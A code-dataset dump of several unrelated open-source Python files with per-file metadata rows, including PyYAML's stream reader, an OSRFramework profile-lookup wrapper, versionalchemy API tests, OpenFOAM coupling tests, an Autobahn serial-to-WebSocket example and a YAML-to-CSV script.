def test_non_marked_lines(self):
'''
Non-marked lines should only get 'p' tags around all input
'''
self.assertEqual(
run_markdown('this line has no special handling'),
'<p>this line has no special handling</p>')
def test_em(self):
'''
Lines surrounded by asterisks should be wrapped in 'em' tags
'''
self.assertEqual(
run_markdown('*this should be wrapped in em tags*'),
'<p><em>this should be wrapped in em tags</em></p>')
def test_strong(self):
'''
Lines surrounded by double asterisks should be wrapped in 'strong' tags
'''
self.assertEqual(
run_markdown('**this should be wrapped in strong tags**'),
'<p><strong>this should be wrapped in strong tags</strong></p>')
if __name__ == '__main__':
unittest.main()
| mit | 2,382,812,926,050,376,000 | 27.195122 | 80 | 0.577855 | false |
fuchsia-mirror/third_party-pyyaml | lib3/yaml/reader.py | 1 | 6874 | # This module contains abstractions for the input stream. You don't have to
# looks further, there are no pretty code.
#
# We define two classes here.
#
# Mark(source, line, column)
# It's just a record and its only use is producing nice error messages.
# Parser does not use it for any other purposes.
#
# Reader(source, data)
# Reader determines the encoding of `data` and converts it to unicode.
# Reader provides the following methods and attributes:
# reader.peek(length=1) - return the next `length` characters
# reader.forward(length=1) - move the current position to `length` characters.
# reader.index - the number of the current character.
# reader.line, stream.column - the line and the column of the current character.
__all__ = ['Reader', 'ReaderError']
from .error import YAMLError, Mark
import codecs, re
class ReaderError(YAMLError):
def __init__(self, name, position, character, encoding, reason):
self.name = name
self.character = character
self.position = position
self.encoding = encoding
self.reason = reason
def __str__(self):
if isinstance(self.character, bytes):
return "'%s' codec can't decode byte #x%02x: %s\n" \
" in \"%s\", position %d" \
% (self.encoding, ord(self.character), self.reason,
self.name, self.position)
else:
return "unacceptable character #x%04x: %s\n" \
" in \"%s\", position %d" \
% (self.character, self.reason,
self.name, self.position)
class Reader(object):
# Reader:
# - determines the data encoding and converts it to a unicode string,
# - checks if characters are in allowed range,
# - adds '\0' to the end.
# Reader accepts
# - a `bytes` object,
# - a `str` object,
# - a file-like object with its `read` method returning `str`,
# - a file-like object with its `read` method returning `unicode`.
# Yeah, it's ugly and slow.
def __init__(self, stream):
self.name = None
self.stream = None
self.stream_pointer = 0
self.eof = True
self.buffer = ''
self.pointer = 0
self.raw_buffer = None
self.raw_decode = None
self.encoding = None
self.index = 0
self.line = 0
self.column = 0
if isinstance(stream, str):
self.name = "<unicode string>"
self.check_printable(stream)
self.buffer = stream+'\0'
elif isinstance(stream, bytes):
self.name = "<byte string>"
self.raw_buffer = stream
self.determine_encoding()
else:
self.stream = stream
self.name = getattr(stream, 'name', "<file>")
self.eof = False
self.raw_buffer = None
self.determine_encoding()
def peek(self, index=0):
try:
return self.buffer[self.pointer+index]
except IndexError:
self.update(index+1)
return self.buffer[self.pointer+index]
def prefix(self, length=1):
if self.pointer+length >= len(self.buffer):
self.update(length)
return self.buffer[self.pointer:self.pointer+length]
def forward(self, length=1):
if self.pointer+length+1 >= len(self.buffer):
self.update(length+1)
while length:
ch = self.buffer[self.pointer]
self.pointer += 1
self.index += 1
if ch in '\n\x85\u2028\u2029' \
or (ch == '\r' and self.buffer[self.pointer] != '\n'):
self.line += 1
self.column = 0
elif ch != '\uFEFF':
self.column += 1
length -= 1
def get_mark(self):
if self.stream is None:
return Mark(self.name, self.index, self.line, self.column,
self.buffer, self.pointer)
else:
return Mark(self.name, self.index, self.line, self.column,
None, None)
def determine_encoding(self):
while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):
self.update_raw()
if isinstance(self.raw_buffer, bytes):
if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):
self.raw_decode = codecs.utf_16_le_decode
self.encoding = 'utf-16-le'
elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):
self.raw_decode = codecs.utf_16_be_decode
self.encoding = 'utf-16-be'
else:
self.raw_decode = codecs.utf_8_decode
self.encoding = 'utf-8'
self.update(1)
NON_PRINTABLE = re.compile('[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\uD7FF\uE000-\uFFFD\U00010000-\U0010ffff]')
def check_printable(self, data):
match = self.NON_PRINTABLE.search(data)
if match:
character = match.group()
position = self.index+(len(self.buffer)-self.pointer)+match.start()
raise ReaderError(self.name, position, ord(character),
'unicode', "special characters are not allowed")
def update(self, length):
if self.raw_buffer is None:
return
self.buffer = self.buffer[self.pointer:]
self.pointer = 0
while len(self.buffer) < length:
if not self.eof:
self.update_raw()
if self.raw_decode is not None:
try:
data, converted = self.raw_decode(self.raw_buffer,
'strict', self.eof)
except UnicodeDecodeError as exc:
character = self.raw_buffer[exc.start]
if self.stream is not None:
position = self.stream_pointer-len(self.raw_buffer)+exc.start
else:
position = exc.start
raise ReaderError(self.name, position, character,
exc.encoding, exc.reason)
else:
data = self.raw_buffer
converted = len(data)
self.check_printable(data)
self.buffer += data
self.raw_buffer = self.raw_buffer[converted:]
if self.eof:
self.buffer += '\0'
self.raw_buffer = None
break
def update_raw(self, size=4096):
data = self.stream.read(size)
if self.raw_buffer is None:
self.raw_buffer = data
else:
self.raw_buffer += data
self.stream_pointer += len(data)
if not data:
self.eof = True
#try:
# import psyco
# psyco.bind(Reader)
#except ImportError:
# pass
| mit | -3,708,321,917,766,483,000 | 34.989529 | 107 | 0.547134 | false |
i3visio/osrframework | osrframework/wrappers/theverge.py | 1 | 3897 | ################################################################################
#
# Copyright 2015-2020 Félix Brezo and Yaiza Rubio
#
# This program is part of OSRFramework. You can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
__author__ = "Felix Brezo, Yaiza Rubio <[email protected]>"
__version__ = "2.0"
from osrframework.utils.platforms import Platform
class Theverge(Platform):
"""A <Platform> object for Theverge"""
def __init__(self):
self.platformName = "Theverge"
self.tags = ["news", "tech"]
########################
# Defining valid modes #
########################
self.isValidMode = {}
self.isValidMode["phonefy"] = False
self.isValidMode["usufy"] = True
self.isValidMode["searchfy"] = False
######################################
# Search URL for the different modes #
######################################
# Strings with the URL for each and every mode
self.url = {}
#self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>"
self.url["usufy"] = "http://www.theverge.com/users/" + "<usufy>"
#self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>"
######################################
# Whether the user needs credentials #
######################################
self.needsCredentials = {}
#self.needsCredentials["phonefy"] = False
self.needsCredentials["usufy"] = False
#self.needsCredentials["searchfy"] = False
#################
# Valid queries #
#################
# Strings that will imply that the query number is not appearing
self.validQuery = {}
# The regular expression '.+' will match any query.
#self.validQuery["phonefy"] = ".*"
self.validQuery["usufy"] = ".+"
#self.validQuery["searchfy"] = ".*"
###################
# Not_found clues #
###################
# Strings that will imply that the query number is not appearing
self.notFoundText = {}
#self.notFoundText["phonefy"] = []
self.notFoundText["usufy"] = [ '<title>404 Not found</title>' ]
#self.notFoundText["searchfy"] = []
#########################
# Fields to be searched #
#########################
self.fieldsRegExp = {}
# Definition of regular expressions to be searched in phonefy mode
#self.fieldsRegExp["phonefy"] = {}
# Example of fields:
#self.fieldsRegExp["phonefy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in usufy mode
self.fieldsRegExp["usufy"] = {}
# Example of fields:
#self.fieldsRegExp["usufy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in searchfy mode
#self.fieldsRegExp["searchfy"] = {}
# Example of fields:
#self.fieldsRegExp["searchfy"]["i3visio.location"] = ""
################
# Fields found #
################
# This attribute will be feeded when running the program.
self.foundFields = {}
| agpl-3.0 | 5,413,026,602,366,703,000 | 37.96 | 80 | 0.523101 | false |
NerdWallet/versionalchemy | tests/test_api.py | 1 | 17354 | from __future__ import absolute_import, division
import copy
from datetime import datetime
from itertools import chain
import six
import sqlalchemy as sa
from six.moves import range, zip
from sqlalchemy import func
from tests.models import ArchiveTable, MultiColumnUserTable, UserTable
from tests.utils import SQLiteTestBase
from versionalchemy.api import delete, get
from versionalchemy.api.data import _get_conditions_list
from versionalchemy.utils import get_dialect
try:
from unittest import mock # PY3
except ImportError:
import mock
class TestDeleteAPI(SQLiteTestBase):
def setUp(self):
super(TestDeleteAPI, self).setUp()
p1 = UserTable(**self.p1)
p3 = UserTable(**self.p3)
self.session.add_all([p1, p3])
self.session.flush()
p1.col1 = 'change1'
p2 = UserTable(**self.p2)
self.session.add_all([p1, p2])
self.session.flush()
p1.col3 = False
p1.col1 = 'change2'
self.session.add(p1)
self.session.flush()
p1.col2 = 15
p2.col2 = 12
self.session.add_all([p1, p2])
self.session.flush()
def test_delete_single_row(self):
conds = [{'product_id': 10}]
delete(UserTable, self.session, conds=conds)
self._verify_deleted(conds[0])
def test_delete_multi_row(self):
conds = [{'product_id': 11}, {'product_id': 10}]
delete(UserTable, self.session, conds=conds)
for c in conds:
self._verify_deleted(c)
def test_delete_rollback(self):
conds = [{'product_id': 10}]
cond_list_1 = _get_conditions_list(UserTable, conds)
with mock.patch(
'versionalchemy.api.data._get_conditions_list',
side_effect=[cond_list_1, Exception()]
):
try:
delete(UserTable, self.session, conds=conds)
self.assertTrue(False, 'Should have raised an exception')
except Exception:
version_col_names = UserTable.va_version_columns
and_clause = sa.and_(*[
getattr(UserTable.ArchiveTable, col_name) == conds[0][col_name]
for col_name in version_col_names
])
res = self.session.execute(
sa.select([func.count(UserTable.ArchiveTable.va_id)])
.where(and_clause)
)
self.assertEqual(res.scalar(), 4)
and_clause = sa.and_(*[
getattr(UserTable, col_name) == conds[0][col_name]
for col_name in version_col_names
])
res = self.session.execute(
sa.select([func.count(UserTable.id)])
.where(and_clause)
)
self.assertEqual(res.scalar(), 1)
class TestMultiColDeleteAPI(SQLiteTestBase):
UserTable = MultiColumnUserTable
def setUp(self):
super(TestMultiColDeleteAPI, self).setUp()
r1 = {
'product_id_1': 11,
'product_id_2': 'foo',
'col1': 'foo',
'col2': 100,
}
p1 = self.UserTable(**r1)
r2 = {
'product_id_1': 11,
'product_id_2': 'bar',
'col1': 'foo',
'col2': 100,
}
p2 = self.UserTable(**r2)
self.session.add_all([p1, p2])
self.session.flush()
p1.col1 = 'change1'
self.session.add(p1)
self.session.flush()
p1.col1 = 'change2'
self.session.add(p1)
self.session.flush()
p1.col2 = 15
p2.col2 = 12
self.session.add_all([p1, p2])
self.session.flush()
def test_delete_single_row(self):
conds = [{'product_id_1': 11, 'product_id_2': 'foo'}]
delete(self.UserTable, self.session, conds=conds)
self._verify_deleted(conds[0])
def test_delete_multi_row(self):
conds = [
{'product_id_1': 11, 'product_id_2': 'bar'},
{'product_id_1': 11, 'product_id_2': 'foo'}
]
delete(self.UserTable, self.session, conds=conds)
for c in conds:
self._verify_deleted(c)
class TestGetAPI(SQLiteTestBase):
def setUp(self):
super(TestGetAPI, self).setUp()
self.p1_history, self.p2_history, self.p3_history = [], [], []
self.t1 = datetime.utcfromtimestamp(10)
p1 = UserTable(**self.p1)
p3 = UserTable(**self.p3)
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t1
self.session.add_all([p1, p3])
self.session.flush()
self.p1_history.append(self._history(p1, self.t1, 0))
self.p3_history.append(self._history(p3, self.t1, 0))
self.t2 = datetime.utcfromtimestamp(20)
p1.col1 = 'change1'
p2 = UserTable(**self.p2)
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t2
self.session.add_all([p1, p2])
self.session.flush()
self.p1_history.append(self._history(p1, self.t2, 1))
self.p2_history.append(self._history(p2, self.t2, 0))
self.t3 = datetime.utcfromtimestamp(30)
p1.col3 = False
p1.col1 = 'change2'
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t3
self.session.add(p1)
self.session.flush()
self.p1_history.append(self._history(p1, self.t3, 2))
self.t4 = datetime.utcfromtimestamp(40)
p1.col2 = 15
p2.col2 = 12
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t4
self.session.add_all([p1, p2])
self.session.flush()
self.p1_history.append(self._history(p1, self.t4, 3))
self.p2_history.append(self._history(p2, self.t4, 1))
def test_get_single_product_no_change(self):
'''
Performs a query for p3 which has no changes for current time, previous time slice,
a time period that includes t1, and a time period that does not include t1.
'''
conds = [{'product_id': 2546}]
result = get(UserTable, self.session, conds=conds)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(5),
conds=conds,
)
self.assertEqual(len(result), 0)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(15),
conds=conds,
)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=self.t1,
conds=conds,
)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(5),
t2=datetime.utcfromtimestamp(11),
conds=conds,
)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(15),
conds=conds,
)
self.assertEqual(len(result), 0)
def test_get_single_product_with_change(self):
'''
Performs a query for p1 which has been changed 3 times for current time, previous time
slices, and various time periods.
'''
conds = [{'product_id': 10}]
result = get(UserTable, self.session, conds=conds)
self._assert_result(result, self.p1_history[-1:])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(15), conds=conds)
self._assert_result(result, self.p1_history[:1])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(35),
conds=conds,
)
self._assert_result(result, self.p1_history[2:3])
result = get(
UserTable,
self.session,
t2=datetime.utcfromtimestamp(35),
conds=conds,
)
self._assert_result(result, self.p1_history[:3])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(45),
conds=conds,
)
self._assert_result(result, self.p1_history[1:])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(35),
conds=conds,
)
self._assert_result(result, self.p1_history[1:3])
def test_get_multiple_products(self):
conds = [{'product_id': 10}, {'product_id': 11}]
result = get(UserTable, self.session, conds=conds)
self._assert_result(result, [self.p1_history[-1], self.p2_history[-1]])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(15), conds=conds)
self._assert_result(result, self.p1_history[:1])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(25), conds=conds)
self._assert_result(result, [self.p1_history[1], self.p2_history[0]])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(45),
conds=conds,
)
self._assert_result(result, list(chain(self.p1_history[1:], self.p2_history)))
def test_get_all_products(self):
result = get(UserTable, self.session)
self._assert_result(result, [self.p1_history[-1], self.p2_history[-1], self.p3_history[-1]])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(31))
self._assert_result(result, [self.p1_history[2], self.p2_history[0], self.p3_history[0]])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(11))
self._assert_result(result, [self.p1_history[0], self.p3_history[0]])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(45),
)
self._assert_result(result, list(chain(self.p1_history[1:], self.p2_history)))
def test_get_products_after_va_id(self):
result = get(
UserTable,
self.session,
va_id=3,
)
self._assert_result(result, [
self.p1_history[1], self.p1_history[2], self.p1_history[3], self.p2_history[1]
])
def test_fields_query(self):
'''
Test specifying fields and make sure dedup happens correctly.
'''
def prune_data(d, fields):
return {k: d[k] for k in fields}
conds = [{'product_id': 10}]
fields = ['col2']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(9),
t2=datetime.utcfromtimestamp(45),
conds=conds,
fields=fields,
)
expected = [self.p1_history[0], self.p1_history[3]]
self._assert_result(result, expected, fields=fields)
fields = ['col1', 'col2']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(9),
t2=datetime.utcfromtimestamp(45),
conds=conds,
fields=fields,
)
self._assert_result(result, self.p1_history, fields=fields)
fields = ['col1']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(9),
t2=datetime.utcfromtimestamp(45),
fields=fields,
)
self._assert_result(
result,
list(chain(self.p1_history[:3], self.p2_history[:1], self.p3_history)),
fields=fields,
)
fields = ['col1', 'col2']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
conds=conds,
fields=fields,
)
self._assert_result(result, self.p1_history[:1], fields=fields)
fields = ['col1', 'col2']
result = get(
UserTable,
self.session,
conds=conds,
fields=fields,
)
self._assert_result(result, self.p1_history[-1:], fields=fields)
fields = ['col1', 'invalid_col']
result = get(
UserTable,
self.session,
conds=conds,
fields=fields,
)
self.p1_history[-1]['va_data']['invalid_col'] = None
self._assert_result(result, self.p1_history[-1:], fields=fields)
def test_failure_conditions(self):
'''
Pass invalid conds arguments and ensure the query fails.
'''
conds = [{'product_id': 10, 'foo': 15}]
with self.assertRaises(ValueError):
get(UserTable, self.session, t1=datetime.utcfromtimestamp(31), conds=conds)
conds = [{'pid': 10}]
with self.assertRaises(ValueError):
get(UserTable, self.session, t1=datetime.utcfromtimestamp(31), conds=conds)
with self.assertRaises(ValueError):
get(UserTable, self.session, page=-10)
def test_paging_results(self):
self.session.execute('delete from {}'.format(UserTable.__tablename__))
self.session.execute('delete from {}'.format(ArchiveTable.__tablename__))
t = datetime.utcfromtimestamp(10000)
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = t
history = []
self.p1['col2'] = 0
p1 = UserTable(**self.p1)
self.session.add(p1)
self.session.commit()
history.append(self._history(p1, t, self.p1['col2']))
# make 500 changes
for i in range(500):
self.p1['col2'] += 1
self.p1['col3'] = int(i < 250)
self.p1['col1'] = 'foobar' + '1' * ((i + 1) // 10)
[setattr(p1, k, v) for k, v in six.iteritems(self.p1)]
self.session.add(p1)
self.session.commit()
history.append(self._history(p1, t, self.p1['col2']))
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=1,
page_size=1000,
)
self._assert_result(result, history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=1,
page_size=100
)
self._assert_result(result, history[:100])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=3,
page_size=100
)
self._assert_result(result, history[200:300])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=5,
page_size=100
)
self._assert_result(result, history[400:500])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
fields=['col1'],
page=1,
page_size=80
)
self._assert_result(result, history[0:80:10], fields=['col1'])
def _assert_result(self, result, expected, fields=None):
self.assertEqual(len(result), len(expected))
for res, exp in zip(result, expected):
res = copy.deepcopy(res)
exp = copy.deepcopy(exp)
self.assertEqual(res['va_id'], exp['va_data']['va_id'])
del res['va_id']
if 'id' in res['va_data']:
del res['va_data']['id']
del res['user_id']
del exp['va_data']['id']
del exp['va_data']['va_id']
if fields is not None:
for k in list(exp['va_data']):
if k not in fields:
del exp['va_data'][k]
self.assertEqual(res, exp)
def _history(self, row, ts, version):
self.assertEqual(row.version(self.session), version)
d = row._to_dict(get_dialect(self.session))
self.assertNotIn('va_id', d)
d['va_id'] = row.va_id
return {
'va_data': d,
'va_updated_at': ts,
'va_deleted': False,
'va_version': version,
'product_id': row.product_id
}
| mit | -9,028,803,835,334,087,000 | 32.501931 | 100 | 0.535093 | false |
Crompulence/cpl-library | examples/sockets/OpenFOAM/OpenFOAM-3.0.1/cpl-socket/tests/stressC-P/test_forces.py | 1 | 5435 | import pytest
import numpy as np
from cplpy import run_test, prepare_config, parametrize_file
import os
import sys
import subprocess
try:
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
except:
"Error: PyFoam package is required to run the tests"
sys.exit()
# -----Forces TESTS-----
# EXPLANATION:
MD_FNAME = "dummyMD_forces.py"
MD_ARGS = MD_FNAME
MD_EXEC = "python"
CFD_FNAME = "test_forces_case"
CFD_ARGS = "-parallel -case " + CFD_FNAME
CFD_EXEC = "CPLIcoFoam"
TEST_TEMPLATE_DIR = os.path.join(os.environ["CPL_PATH"], "test/templates")
TEST_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.fixture()
def prepare_config_fix(tmpdir):
prepare_config(tmpdir, TEST_DIR, MD_FNAME, CFD_FNAME)
def compare_forces(tol, cfd_params, md_fname="md_forces.dat",
openfoam_dir="test_forces_case/2"):
ncx, ncy, ncz = cfd_params["ncx"], cfd_params["ncy"], cfd_params["ncz"]
Lx, Ly, Lz = cfd_params["lx"], cfd_params["ly"], cfd_params["lz"]
s_xy = ParsedParameterFile(openfoam_dir + "/sigmaxy")["internalField"]
s_yz = ParsedParameterFile(openfoam_dir + "/sigmayz")["internalField"]
s_yy = ParsedParameterFile(openfoam_dir + "/sigmayy")["internalField"]
cell_cx = ParsedParameterFile(openfoam_dir + "/ccx")["internalField"]
cell_cy = ParsedParameterFile(openfoam_dir + "/ccy")["internalField"]
cell_cz = ParsedParameterFile(openfoam_dir + "/ccz")["internalField"]
openfoam_cells = {}
cell_no = 0
for cell_no in xrange(0, len(s_xy)):
cell_coord = (float(cell_cx[cell_no]), float(cell_cy[cell_no]), float(cell_cz[cell_no]))
# Openfoam output cell centres with 6 decimal figures
k = "{0:.5f}".format(cell_coord[0]), "{0:.5f}".format(cell_coord[1]),\
"{0:.5f}".format(cell_coord[2])
openfoam_cells[k] = np.array([float(s_xy[cell_no]), float(s_yy[cell_no]),
float(s_yz[cell_no])])
# Line format of dummy md forces file -- > x y z sxy syy szy
with open(md_fname, "r") as cfd_file:
cfd_lines = cfd_file.readlines()
md_lines = [l[:-1].split(" ") for l in cfd_lines]
md_cells = {}
for l in md_lines:
k = "{0:.5f}".format(float(l[0])), "{0:.5f}".format(float(l[1])), "{0:.5f}".format(float(l[2]))
md_cells[k] = np.array([float(l[3]), float(l[4]), float(l[5])])
for k in md_cells.keys():
try:
diff_forces = abs(md_cells[k] - openfoam_cells[k])
if (np.any(diff_forces > tol)):
print md_cells[k]
print openfoam_cells[k]
assert False
except KeyError:
print "Cell not found: cell " + k
assert False
# -----FORCES TESTS-----
# EXPLANATION: See README-test located in this folder.
@pytest.mark.parametrize("cfdprocs, mdprocs, cells, err_msg", [
((3, 3, 3), (3, 3, 3), (15, 15, 15), ""),
((1, 2, 1), (3, 2, 2), (30, 36, 24), ""),
((4, 3, 3), (4, 3, 3), (20, 15, 27), ""),
((3, 3, 3), (3, 3, 3), (30, 15, 21), "")])
def test_forcesC2P(prepare_config_fix, cfdprocs, mdprocs, cells, err_msg):
MD_PARAMS = {"lx": 300.0, "ly": 300.0, "lz": 300.0}
MD_PARAMS["npx"], MD_PARAMS["npy"], MD_PARAMS["npz"] = mdprocs
CFD_PARAMS = {"lx": 300.0, "ly": 300.0, "lz": 300.0}
CFD_PARAMS["npx"], CFD_PARAMS["npy"], CFD_PARAMS["npz"] = cfdprocs
CFD_PARAMS["ncx"], CFD_PARAMS["ncy"], CFD_PARAMS["ncz"] = cells
# Needed for decomposParDict
CFD_PARAMS["nprocs"] = cfdprocs[0]*cfdprocs[1]*cfdprocs[2]
CONFIG_PARAMS = {"cfd_bcx": 1, "cfd_bcy": 0, "cfd_bcz": 0,
"olap_xlo": 1, "olap_xhi": cells[0],
"olap_ylo": 1, "olap_yhi": 5,
"olap_zlo": 1, "olap_zhi": cells[2],
"cnst_xlo": 1, "cnst_xhi": cells[0],
"cnst_ylo": 3, "cnst_yhi": 5,
"cnst_zlo": 1, "cnst_zhi": cells[2],
"tstep_ratio": 1, }
# Parametrize OpenFOAM files
mesh_file = os.path.join(CFD_FNAME+"/", "constant/polyMesh/blockMeshDict")
parametrize_file(mesh_file, mesh_file, CFD_PARAMS)
control_dict_file = os.path.join(CFD_FNAME+"/", "system/decomposeParDict")
parametrize_file(control_dict_file, control_dict_file, CFD_PARAMS)
try:
subprocess.check_output(["blockMesh", "-case", CFD_FNAME])
except:
assert False
try:
subprocess.check_output(["decomposePar", "-case", CFD_FNAME])
except:
assert False
correct = run_test(TEST_TEMPLATE_DIR, CONFIG_PARAMS, MD_EXEC, MD_FNAME, MD_ARGS,
CFD_EXEC, CFD_FNAME, CFD_ARGS, MD_PARAMS, CFD_PARAMS, err_msg, True)
if correct:
# Reconstruct the fields from processor directories.
try:
subprocess.check_output(["reconstructPar", "-case", CFD_FNAME])
except:
assert False
# Reconstruct the fields from processor directories.
try:
subprocess.check_output(["writeCellCentres", "-case", CFD_FNAME])
except:
assert False
# Calculate stress components using ...
try:
subprocess.check_output(["stressComponents", "-case", CFD_FNAME])
except:
assert False
compare_forces(1e-6, CFD_PARAMS)
| gpl-3.0 | -8,364,304,484,368,054,000 | 37.274648 | 103 | 0.570377 | false |
danielfaust/AutobahnPython | examples/serial2ws/serial2ws.py | 1 | 4492 | ###############################################################################
##
## Copyright 2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys, time
if sys.platform == 'win32':
## on windows, we need to use the following reactor for serial support
## http://twistedmatrix.com/trac/ticket/3802
##
from twisted.internet import win32eventreactor
win32eventreactor.install()
from twisted.internet import reactor
print "Using Twisted reactor", reactor.__class__
print
from twisted.python import usage, log
from twisted.protocols.basic import LineReceiver
from twisted.internet.serialport import SerialPort
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.websocket import listenWS
from autobahn.wamp import WampServerFactory, WampServerProtocol, exportRpc
class Serial2WsOptions(usage.Options):
optParameters = [
['baudrate', 'b', 9600, 'Serial baudrate'],
['port', 'p', 3, 'Serial port to use'],
['webport', 'w', 8080, 'Web port to use for embedded Web server'],
['wsurl', 's', "ws://localhost:9000", 'WebSocket port to use for embedded WebSocket server']
]
## MCU protocol
##
class McuProtocol(LineReceiver):
## need a reference to our WS-MCU gateway factory to dispatch PubSub events
##
def __init__(self, wsMcuFactory):
self.wsMcuFactory = wsMcuFactory
## this method is exported as RPC and can be called by connected clients
##
@exportRpc("control-led")
def controlLed(self, status):
if status:
print "turn on LED"
self.transport.write('1')
else:
print "turn off LED"
self.transport.write('0')
def connectionMade(self):
log.msg('Serial port connected.')
def lineReceived(self, line):
try:
## parse data received from MCU
##
data = [int(x) for x in line.split()]
## construct PubSub event from raw data
##
evt = {'id': data[0], 'value': data[1]}
## publish event to all clients subscribed to topic
##
self.wsMcuFactory._dispatchEvent("http://example.com/mcu#analog-value", evt)
log.msg("Analog value: %s" % str(evt));
except ValueError:
log.err('Unable to parse value %s' % line)
## WS-MCU protocol
##
class WsMcuProtocol(WampServerProtocol):
def onSessionOpen(self):
## register topic prefix under which we will publish MCU measurements
##
self.registerForPubSub("http://example.com/mcu#", True)
## register methods for RPC
##
self.registerForRpc(self.factory.mcuProtocol, "http://example.com/mcu-control#")
## WS-MCU factory
##
class WsMcuFactory(WampServerFactory):
protocol = WsMcuProtocol
def __init__(self, url):
WampServerFactory.__init__(self, url)
self.mcuProtocol = McuProtocol(self)
if __name__ == '__main__':
## parse options
##
o = Serial2WsOptions()
try:
o.parseOptions()
except usage.UsageError, errortext:
print '%s %s' % (sys.argv[0], errortext)
print 'Try %s --help for usage details' % sys.argv[0]
sys.exit(1)
baudrate = int(o.opts['baudrate'])
port = int(o.opts['port'])
webport = int(o.opts['webport'])
wsurl = o.opts['wsurl']
## start Twisted log system
##
log.startLogging(sys.stdout)
## create Serial2Ws gateway factory
##
wsMcuFactory = WsMcuFactory(wsurl)
listenWS(wsMcuFactory)
## create serial port and serial port protocol
##
log.msg('About to open serial port %d [%d baud] ..' % (port, baudrate))
serialPort = SerialPort(wsMcuFactory.mcuProtocol, port, reactor, baudrate = baudrate)
## create embedded web server for static files
##
webdir = File(".")
web = Site(webdir)
reactor.listenTCP(webport, web)
## start Twisted reactor ..
##
reactor.run()
| apache-2.0 | -472,536,809,727,559,940 | 26.900621 | 98 | 0.637133 | false |
benformosa/Toolbox | yaml2csv.py | 1 | 1493 | #!/usr/bin/env python2
import argparse
import csv
import itertools
import sys
import yaml
def main():
parser = argparse.ArgumentParser(
description='Convert a YAML mapping or sequence of mappings to a CSV'
)
parser.add_argument(
'file',
type=argparse.FileType('r'),
default=sys.stdin,
help='YAML file to process',
)
parser.add_argument(
'-s', '--sort-headers',
action='store_true',
help='Sort headers',
)
parser.add_argument(
'-e', '--headers',
type=str,
default=None,
help='Comma-separated list of headers',
)
args = parser.parse_args()
data = yaml.safe_load(args.file)
if type(data) is dict:
data = [data]
if type(data) is list:
if not args.headers:
headers = set(flatten([d.keys() for d in data]))
else:
headers = args.headers.split(',')
if args.sort_headers:
headers = sorted(headers)
writer = csv.DictWriter(sys.stdout, fieldnames=headers)
writer.writeheader()
writer.writerows(data)
else:
print("Error: data is not a YAML sequence or mapping")
sys.exit(1)
def flatten(list_of_lists):
"""Flatten one level of nesting
From itertools docs
"""
return list(itertools.chain.from_iterable(list_of_lists))
if __name__ == '__main__':
main()
| unlicense | 8,178,630,155,088,478,000 | 24.741379 | 81 | 0.553918 | false |
